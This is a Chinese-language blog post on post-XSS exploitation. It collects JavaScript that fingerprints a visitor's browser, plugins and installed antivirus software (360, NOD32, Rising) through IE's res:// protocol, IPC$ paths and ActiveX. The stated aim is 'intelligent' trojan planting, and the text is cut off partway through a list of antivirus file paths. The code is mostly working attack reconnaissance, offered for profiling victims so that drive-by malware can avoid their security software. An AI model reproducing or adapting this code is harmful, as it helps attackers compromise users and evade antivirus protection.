xss后续利用中,可能需要检测客户端环境,比如浏览器版本,是否安装360、杀毒软件、java版本、某些系统文件等……
涛涛电脑知识网
可以利用javascript来检测这些,很多年前就开始有网马加入这些功能了,以实现“智能挂马”,这里汇总下……
1、User-Agent
HTTP 头 User-Agent 中可以获取很多信息,可以参阅本站另外几篇文章:
【CSRF】基于图片方式(<img)的 DDOS、CC、会话劫持以及刺探用户信息
【Asp原创】Asp超详细显示客户端系统信息
【Asp】ASP获取客户端/服务器相关信息
【Asp】Asp超精准判断客户端浏览器类型
【Asp】判断客户端系统和浏览器类型以及版本
2、IE 下面一般可以利用 IPC$、RES 协议或者 activeX 检测
RES:
注意:Microsoft RES 协议生效浏览器范围:IE 4.0 --> IE 6.0
<img src="res://C:\Program Files\ESET\ESET NOD32 Antivirus\egui.exe/gif/120" onerror="javascript:alert('no nod32')">
IPC$:
<script type="text/javascript">
window.onerror = function(){alert("nod32");}
</script>
<script src="\\127.0.0.1\c$\Program Files\ESET\ESET NOD32 Antivirus\egui.exe"></script>
activeX:
<script type="text/javascript">
var Is360;
var bFilter360=false;
if(bFilter360)
{
try {
var g;
var glworld=new ActiveXObject("360SafeLive.Update");
}
catch(g){};
finally {
if(g=="[object Error]") {
Is360 = "Not find 360";
}
else {
Is360 = "Find 360";
//window.location="about:blank";
}
}
}
</script>
利用UA和javascript的navigator对象及res协议就可以实现IP、操作系统、浏览器版本、flash版本、java版本、是否装特定软件等的检测。
收集一些常用软件的clsid再javascript检测。
示例程序若干:
javascript 利用 User-Agent 判断浏览器类型:
<HTML>
<SCRIPT LANGUAGE="javascript">
<!--
function CheckBrowser() { //判断浏览器类型
if (navigator.userAgent.indexOf("MSIE") > 0) {
return "MSIE";
}
if (isFirefox = navigator.userAgent.indexOf("Firefox") > 0) {
return "Firefox";
}
if (isSafari = navigator.userAgent.indexOf("Safari") > 0) {
return "Safari";
}
if (isCamino = navigator.userAgent.indexOf("Camino") > 0) {
return "Camino";
}
if (isMozilla = navigator.userAgent.indexOf("Gecko") > 0) {
return "Gecko";
}
}
document.write("<font color=#ff0000>您的浏览器类型为:" + CheckBrowser() + "</font><br>");
-->
</SCRIPT>
</HTML>
利用RES协议检测杀毒软件是否存在:
<HTML>
<SCRIPT LANGUAGE="javascript">
<!--
//利用RES协议检测杀毒软件是否存在
//Microsoft RES 协议生效浏览器范围:IE 4.0 --> IE 6.0
function ErrorSilent() { //屏蔽错误
return true;
}
window.onerror = ErrorSilent; //屏蔽错误
function CheckSoft() {
Soft_List = [ //待检测的软件列表
'res://cmd.exe/16/1',
'res://shell32.dll/2/131',
'res://C:\\WINDOWS\\explorer.exe/2/143',
'res://C:\\Program%20Files\\Internet%20Explorer\\Connection%20Wizard\\icwconn1.exe/2/210',
'res://C:\\Program%20Files\\QQ\\QQRes.dll/2/108',
'res://C:\\360safe\\360Safe.exe/GIF/172',
'res://C:\\360safe\\safemon\\loadwdui.dll/PNG/130',
'res://C:\\Program%20Files\\360\\360Safe\\360hotfix.exe/GIF/172',
'res://C:\\Program%20Files\\360\\360Safe\\360Safe.exe/GIF/172',
'res://C:\\Program%20Files\\360\\360Safe\\safemon\\loadwdui.dll/PNG/130',
'res://C:\\program%20files\\360safe\\360hotfix.exe/GIF/172',
'res://C:\\program%20files\\360safe\\360Safe.exe/GIF/172',
'res://C:\\program%20files\\360safe\\safemon\\loadwdui.dll/PNG/130',
'res://C:\\Program%20Files\\Rising\\Rav\\rssafety.exe/PNG/123',
'res://D:\\360safe\\360Safe.exe/GIF/172',
'res://D:\\360safe\\safemon\\loadwdui.dll/PNG/130',
'res://D:\\Program%20Files\\360\\360Safe\\360hotfix.exe/GIF/172',
'res://D:\\Program%20Files\\360\\360Safe\\360Safe.exe/GIF/172',
'res://D:\\Program%20Files\\360\\360Safe\\safemon\\loadwdui.dll/PNG/130',
